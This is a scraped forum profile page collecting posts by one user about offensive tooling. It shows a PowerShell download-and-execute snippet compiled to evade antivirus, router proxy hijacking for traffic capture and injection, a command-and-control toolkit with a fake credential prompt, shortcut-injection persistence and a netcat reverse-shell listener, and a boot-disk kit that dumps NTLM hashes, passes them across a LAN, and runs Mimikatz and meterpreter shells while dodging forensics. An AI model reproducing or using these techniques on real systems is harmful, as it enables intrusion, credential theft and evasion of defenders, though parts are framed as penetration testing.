Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Recent Profile Visitors

916 profile views

xor-function's Achievements


Newbie (1/14)

  1. xor-function


    I just wanted to let everybody here know about ps2exe, if you don't already. You can find it on TechNet if you search for it. What it does is compile a script to an executable by using a c# source code template that runs the script using the system.management.automation assembly. Since it uses a class library it stands a pretty good chance on bypassing any restrictions on the Powershell.exe program file. This is an example script I compiled using ps2exe. function start-download { [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } IEX (New-Object System.Net.Webclient).DownloadString('https://some-domain.com/ps-script.ps1') [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $false } } start-download This way you can change the code server side without having to recompile the binary unless you need to change the URL. So far AV doesn't light up and It seems to be working in Windows 10.
  2. Check if your router's admin menu contains settings for an http proxy, input the info of a proxy server you control (vps). Once this is done all regular http traffic will be forwarded to this proxy. You could then start capturing traffic from the router on the proxy. Taking this further you can inject traffic from the proxy server. On squid you can enable a url rewrite program ( you have to create this program ). I found using an http proxy, without touching https works well. This is pretty much what many organizations do to their internal network (content filter). I've found that when tampering with DNS the individual can get stuck in a redirection loop or some client side scripts for the web page you are trying to spoof are hosted on that very domain so they aren't loaded by the web browser which alerts them of a problem.
  3. Fathomless has been a project I have been working on and includes some new tools. Running environment is Ubuntu 14.04 LTS Updated the description below to include recent changes. Async Shell Handler: Provides a prototype C&C web server along with an asynchronous powershell client, and a basic command interface. The server is hosted on an lighttpd server using HTTPS with a self-signed certificate. Since the C&C is a cgi hosted on a lighttpd server you can edit the included lighttpd.conf to only allow connections from the expected IP range. The async client performs basic key fingerprint comparison for the self-signed cert and basic authentication to the C&C. These values are randomly generated upon installation. All requests and responses from the client are performed via HTTPS GET requests with url safe base64 encoded strings. The client initially operates in memory so if it exits or the system reboots the process will be terminated and flushed from memory. Limited persistence has been added via the shortcut-inject function avaliable in the async and tcp powershell clients. The tcp reverse shell version of the client does not require the C&C component just an open tcp port with netcat ex: nc -lvvp 443 Available functions from the client: * get-info Displays a summary of current host * exec-script "name-of-script" Executes script hosted server side in /var/async-shell/ps-scripts by IEX requires the name of the script filename as a parameter. * obfuscate "name of text file / script" Uses a polyalphabetic obfuscation method on base64 strings writes obfuscated string to file and provides a de-obfuscation key. * de-obfuscate "(name of text file / script), (key)" Performs the inverse of the obfuscation function requires the text file with the obfuscated base64 data and de-obfuscation key as parameters. * gen-key generates a random alphabetic string for use with the obfuscate-base64 function. * obfuscate-base64 "(action:hide or clear ), (key: obfuscation or de-ofuscation), (base64-string)" The function that contains the obfuscation engine, it works only with clear base64 data. * byte-encode ( binary-to-obfuscate, key ) Performs byte-encoding prior to converting to obfuscated base64 provide key de-obfuscation. * byte-decode ( file-containing-obfu-base64, key ) performs the reverse of byte-encode, requires the de-obfuscation key. * askfor-creds Performs some social engineering in order to acquire plain-text credentials. This is done by generating a authentication popup which seems to reconnect to a network share. * gen-enccmd "your command string" Generates a PowerShell formatted encoded command. Insure to quote your command string. ex: gen-enccmd "cmd /c ipconfig /all" * shortcut-inject "name-of-lnk" "Url-hosting-script" Modifies the specified shortcut to run the original program and also execute a download and execute command string. Ex: "Google Chrome.lnk" "full url to powershell script" Requires the http:// or https:// in the URL. gen-obfuscated Enables execution of a command string on systems while evading countermeasures, specifically AV signature based detection. This is accomplished by focusing on obfuscating command strings that typically download a short script involved in first-stage/initial access. boot2own: Live OS that dumps hashes and uses them with winexe to execute commands on remote systems. I haven't updated it yet since I have been waiting for UEFI support to mature (shim & preloader). Once that happens I will invest time in it. Find it on github (.) com/xor-function/fathomless Let me know if you run into issues.
  4. Most attacks on encryption center on stealing the private key or weakening them by sabotaging PRNG functions used by key generators in a target software implementation. This is most easily done by bribing developers so it then becomes a "DOJ feature" not a weakness. A direct computational attack on public-key encryption requires factorization of the public key to acquire the private key. With todays supercomputers, keys over 2048 bits are not possible to acquire through factorization within a practical time frame. Why blow billions of dollars to maybe crack something on experimental tech? When you can buy and or create a software exploit for a few hundred grand (vupen, hacking team etc...) in order to steal the private key? You probably don't even need an exploit just malware (0 day viruses), but that's another thread.
  5. I added a download link for a demo iso. It's in the README of the boot2own git repo posted above for anyone that's interested. Let me know if you have any issues. I've also thought about decreasing the time for PXE booting. The way that would work would be by booting the PLOP boot manager (plpbt.bin is around 50kb) instantly over PXE bypassing any locked BIOS to use a live usb. The catch is that live usb stick's need to remain attached to the PC. To get around this copy the entire file system to ram, now removing the usb after boot would not affect the live OS session. I might be able to get the load time down noticeably. Then continue as before. To do this on crunchbang would require a patch to the initrd.img, maybe use debirf to generate a custom initrd to avoid patches? I might add slax to the mix as copy2ram is a supported feature that apparently only requires 320MB of ram to work. I have been messing with it and so far it's just dependencies that are a problem. I'll update the git repo when I figure something out and have time to build it.
  6. The code is public, do the necessary testing to be confident yourself. So far the concept seems to be more than theory. I already have a boot disk/usb/pxe prototypes. Obviously this still needs live testing but this is a good start.
  7. Let me expand further over how this is used. what is automated is the immediate extraction of NTLM hashes from the local admin. How this is used by the patch winexe binary is up to you. Some example payloads using powershell are provided, but this is just to convey what can be done. Here is a screen shot of the terminal menu of the live OS. Once a option is selected the execution run is automated. If you don't want that then before generating the iso. edit b2o-autopwn.sh to select an option automatically with your customization. It's designed to be customized that's why there is no iso provided only build scripts. This toolkit is for a tester that is able to infiltrate the physical location of the client's network, it doesn't need to be the server room to get a SYSTEM level foothold (janitorial dept workstation). It is made to do this rather quickly. So if a tester is able to gain entry to a client's build for about 20 min, ideally 10 min, you know what can come next. This is designed to bypass USB protections BIOS protections (it's usually locked to PXE boot) Firewall protections IDS and AV (arp used once / winexe) Cleaning up is easy as most is done in memory.
  8. A rouge DHCP server is not used on their network as you would not want this being served to random users, only the accessed workstation in front of the tester. But PXE is still used.... This is accomplished by employing an SoC device (rasp pi/beagle bone) or laptop and using a short Ethernet patch cable directly into the machine from the device/laptop. Here is an example. This, obviously can be configured in a more discreet manner. Once the OS is loaded just reconnect the workstation back to the original network. Use a device with a gigabit Ethernet port for speed (about 3 min) otherwise it could take 10 min to load the OS.
  9. After looking around, it seem this forum seems pretty balanced morally but also innovative. So I decided to present this toolkit here. It's started out as something simple but grew quickly. let me know if it has any bug's and what you think of this, thoughts opinions. I know there will be many typos. It's on git hub as the repo boot2own under user xor-function. github(dot)com / xor-function / boot2own The contents of the ABOUT file Apologies in advance is this is not the proper place for this. SUMMARY B2O is a toolkit that generates a live OS from a crunchbang iso. From this live environment attacks are performed on the HDD to gain NTLM hashes to leverage in additional attacks against a network. Used crunchbang-11-20130506-i686.iso successfully to generate liveCD. Used Ubuntu Server x86 12.04 successfully to compile patched winexe So use Ubuntu Server/Desktop x86 12.04 to compile binary for i686 crunchbang iso. Tested only on Hard drive with Windows 7 installed SHELL SCRIPTS: b2o-compile.sh compiles the patch winexe binaries that allow hash passing b2o-isogen.sh uses a crunchbang iso to generate a remastered iso live OS (B2O) with the automated attack tools. b2o-pxe.sh Creates a pxe server that serves the remastered B2O live OS. b2o-listener.sh starts a meterpreter listener with the configured options to msfconsole, use with option 3 in the B2O live OS. (Requires Metaspliot to be installed along with system_migrate.rb) b2o-autopwn.sh Attack engine, this script only runs in the live OS environment and provides a terminal menu with automated attack options. LIVE OS: The live OS chosen is CrunchBang Linux (I like it) The live filesystem is a squashfs filesystem. To remaster/mod it install squashfs-tools and genisoimage. To make a live USB use Unetbootin as the dd method fails. The expanded filesystem.squashfs was mounted an chrooted into to install the following packages: arp-scan lighttpd The core files that make the B2O live environment: root │ └─ boot-2-own ├── boot2own-autopwn.sh ├── creddump │ ├── cachedump.py │ ├── CHANGELOG │ ├── COPYING │ ├── framework │ ├── lsadump.py │ ├── pwdump.py │ └── README ├── CREDITS-B2O └── pwinexe A terminator shell is loaded on boot by modding (/etc/skel/.config/openbox/autostart) the following line was appended to the autostart file: -------------------------------------------------------------------------------------------------------------------- terminator --geometry=750x600 -e 'sudo /bin/bash -c /root/boot-2-own/b2o-autopwn.sh' & -------------------------------------------------------------------------------------------------------------------- Once B2O is booted up on a domain computer it boot2own-autopwn.sh automatically mounts the hard drive and then reads the local hashes using creddump (written by Brendan Dolan-Gavitt). Booting a live OS on a computer can be done by a USB device but a more promising method is PXE. This is practical as it is simple to make an arm SoC (beagle bone/Rasp Pi) serve B2O over PXE. Also there is no need to leave any physical media attached to the used PC after the OS is loaded into RAM. Once booted it singles out the local administration user name and it's corresponding NTLM hash and imports these as variables. Winexe is the one of the only programs that enable cli interaction with Windows computers from Linux. Unlike Psexec it does not pass hashes I used the samba-hashpass.patch from the smbexec project (Eric Milam & Martin Bos) and created a custom build/compile script to create a patched winexe binary (rename to pwinexe to prevent confusion). Now the user and hash variables can then be passed to a function using pwinexe for additional machine access. The patched winexe also has the option to run as SYSTEM along with the option to uninstall itself from the machine upon command completion. POST EXPLOITATION Once the local admin username and hash are retrieved boot2own-autopwn.sh it acquires the ip address of other computers in the LAN using arp-scan. Once this is done you are presented with payload options for pwinexe. I chose powershell as the attacks can be completely in memory. This makes forensics and IR quite difficult especially since the attack platform itself is in memory (boot disk/PXE). This seems to be the least likely method to be caught by AV solutions. Although to reduce the chance of detection further one can try obfuscation, base64 encoding after adding unused random variables into the command string. The PS payloads used in B2O are Invoke-Mimikatz (written by Joe Bialek) and Invoke-Shellcode (written by Matthew Graeber) both are part of PowerSploit. More details about theses scripts are located in the credits. To use these payloads without writing to disk, they must not be copied over prior to use. To insure the powershell payloads are only run in memory I employed a lighttpd web server to host the payloads. Now they can be retrieved and copied to an expression or variable in memory before execution. The Auto-Off option: This is an optional feature that powers off the live OS Session after a selected payload finishes performing an execution run on the detected IP's in the LAN. This can be useful as one can turn off the monitor then leave and let the live OS session power itself off after it finishes it's run. Invoke-Mimikatz reflectively loads Mimikatz in memory using powershell allowing the ability to acquire plain text passwords the results are copied to the file /root/loot in the B2O live file system To rsync/http-put-get through tor/i2p/etc.. this file to an external server just append the necessary code before the while loop ends at the bottom of boot2own-autopwn.sh. Invoke-Shellcode makes it possible to have reverse system shells connect to the specified IP or domain. It depends on MSF windows/meterpreter/reverse_https shell multi handler. It also depends on a modified version of smart_migrate, a Metasploit manage module. The modified module is named system_migrate.rb and is included in the folder. It's priority is to migrate out of powershell to an existing NT AUTHORITY/ SYSTEM process to maintain this permissions level. If it is not able to migrate out of powershell the patched winexe process will hang as powershell remains active. CAVEATS All of the following parameters must exist for success. The victim network IT Department uses the local administrator user account on domain computers. There is no hard disk encryption being used on the selected workstation. Their workstations boot to PXE or their BIOS is unlocked.
  • Create New...